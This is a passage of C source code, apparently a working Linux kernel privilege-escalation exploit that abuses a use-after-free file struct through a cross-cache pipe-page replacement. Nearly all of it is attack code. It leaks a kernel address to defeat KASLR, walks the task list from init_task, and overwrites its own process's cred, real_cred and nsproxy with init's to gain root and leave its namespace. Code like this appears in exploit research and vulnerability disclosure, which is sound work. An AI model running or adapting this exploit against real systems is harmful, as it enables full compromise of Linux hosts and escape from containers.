uint64_t files_ptr = read_8_at(g_file_array);
// Adjust the files_ptr to point to our fd in the array
files_ptr += (sizeof(uint64_t) * g_uaf_fd);
// Get the address of our UAF file struct
uint64_t curr_file = read_8_at(files_ptr);
// Calculate the offset
g_off = curr_file & 0xFFF;
// Set the globals
g_file_addr = curr_file;
g_pipe_buf = g_file_addr - g_off;
return;
}
void make_ring_copy(void)
{
// Get the base of the files array
uint64_t files_ptr = read_8_at(g_file_array);
// Adjust the files_ptr to point to our ring fd in the array
files_ptr += (sizeof(uint64_t) * g_ring.ring_fd);
// Get the address of our UAF file struct
uint64_t curr_file = read_8_at(files_ptr);
// Copy all the data into the buffer
for (size_t i = 0; i < 32; i++)
{
uint64_t *val_ptr = (uint64_t *)&g_ring_copy[i * 8];
*val_ptr = read_8_at(curr_file + (i * 8));
}
}
// Here, all we're doing is determing what side of the page the UAF file is on,
// if its on the front half of the page, the back half is our scratch space
// and vice versa
void set_scratch_space(void)
{
g_scratch = g_pipe_buf;
if (g_off < 0x500) { g_scratch += 0x500; }
}
// We failed cross-cache stage, either because we didnt replace UAF object
void cc_fail(void)
{
cc_reset();
close(g_uaf_fd);
g_uaf_fd = -1;
release_pipe();
create_pipe();
sleep(1);
}
void write_pipe(unsigned char *buf)
{
if (write(g_pipe.fd[PIPE_WRITE], buf, 4096) == -1)
{
err("`write()` failed");
}
}
int main(int argc, char *argv[])
{
info("Setting up exploit environment...");
setup_env();
// Create a debug buffer
unsigned char buf[4096] = { 0 };
memset(buf, 'A', 4096);
retry_cc:
// Do cross-cache attempt
info("Attempting cross-cache...");
do_cc();
// Replace UAF file (and page) with pipe page
write_pipe(buf);
// Try to `lseek()` which should fail if we succeeded
if (lseek(g_uaf_fd, 0, SEEK_SET) != -1)
{
printf("[!] Cross-cache failed, retrying...");
cc_fail();
goto retry_cc;
}
// Success
info("Cross-cache succeeded");
sleep(1);
// Leak the `error_entry` pointer
uint64_t error_entry = read_8_at(ERROR_ENTRY_ADDR);
info("Leaked `error_entry` address: 0x%lx", error_entry);
// Make sure it seems kernel-ish
if ((uint16_t)(error_entry >> 48) != 0xFFFF)
{
err("Weird `error_entry` address: 0x%lx", error_entry);
}
// Set kernel base
g_kern_base = error_entry - EE_OFF;
info("Kernel base: 0x%lx", g_kern_base);
// Read 8 bytes at that address and see if they match our signature
uint64_t sig = read_8_at(g_kern_base);
if (sig != KERNEL_SIGNATURE)
{
err("Bad kernel signature: 0x%lx", sig);
}
// Set init_task
g_init_task = g_kern_base + INIT_OFF;
info("init_task @ 0x%lx", g_init_task);
// Get the cred and nsproxy values
g_cred_what = read_8_at(g_init_task + CRED_OFF);
g_nsproxy_what = read_8_at(g_init_task + NSPROXY_OFF);
if ((uint16_t)(g_cred_what >> 48) != 0xFFFF)
{
err("Weird init->cred value: 0x%lx", g_cred_what);
}
if ((uint16_t)(g_nsproxy_what >> 48) != 0xFFFF)
{
err("Weird init->nsproxy value: 0x%lx", g_nsproxy_what);
}
info("init cred address: 0x%lx", g_cred_what);
info("init nsproxy address: 0x%lx", g_nsproxy_what);
// Traverse the tasks list
info("Traversing tasks linked list...");
traverse_tasks();
// Check to see if we succeeded
if (!g_target_task) { err("Unable to find target task!"); }
if (!g_our_task) { err("Unable to find our task!"); }
// We found the target task
info("Found '%s' task @ 0x%lx", TARGET_TASK, g_target_task);
info("Found '%s' task @ 0x%lx", OUR_TASK, g_our_task);
// Set where gadgets
g_cred_where = g_target_task + CRED_OFF;
g_real_cred_where = g_target_task + REAL_CRED_OFF;
g_nsproxy_where = g_target_task + NSPROXY_OFF;
info("Target cred @ 0x%lx", g_cred_where);
info("Target real_cred @ 0x%lx", g_real_cred_where);
info("Target nsproxy @ 0x%lx", g_nsproxy_where);
// Locate our file descriptor table
g_files = g_our_task + FILES_OFF;
g_fdt = read_8_at(g_files) + FDT_OFF;
g_file_array = read_8_at(g_fdt) + FD_ARRAY_OFF;
info("Our files @ 0x%lx", g_files);
info("Our file descriptor table @ 0x%lx", g_fdt);
info("Our file array @ 0x%lx", g_file_array);
// Find our pipe address
find_pipe_buf_addr();
info("UAF file addr: 0x%lx", g_file_addr);
info("Pipe buffer addr: 0x%lx", g_pipe_buf);
// Set the global scratch space side of the page
set_scratch_space();
info("Scratch space base @ 0x%lx", g_scratch);
// Make a copy of our real io_uring file descriptor since we need to fake
// one
info("Making copy of legitimate io_uring fd...");
make_ring_copy();
info("Copy done");
// Overwrite our task's cred with init's
info("Overwriting our cred with init's...");
overwrite_cred();
// Make sure it's correct
uint64_t check_cred = read_8_at(g_cred_where);
if (check_cred != g_cred_what)
{
err("check_cred: 0x%lx != g_cred_what: 0x%lx",
check_cred, g_cred_what);
}
// Overwrite our real_cred with init's cred
sleep(1);
info("Overwriting our real_cred with init's...");
overwrite_real_cred();
// Make sure it's correct
check_cred = read_8_at(g_real_cred_where);
if (check_cred != g_cred_what)
{
err("check_cred: 0x%lx != g_cred_what: 0x%lx", check_cred, g_cred_what);
}
// Overwrite our nsproxy with init's
sleep(1);
info("Overwriting our nsproxy with init's...");
overwrite_nsproxy();
// Make sure it's correct
check_cred = read_8_at(g_nsproxy_where);
if (check_cred != g_nsproxy_what)
{
err("check_rec: 0x%lx != g_nsproxy_what: 0x%lx",
check_cred, g_nsproxy_what);
}
info("Creds and namespace look good!");
// Let the child loose
*(int *)g_shmem = 0x1337;
sleep(3000);
}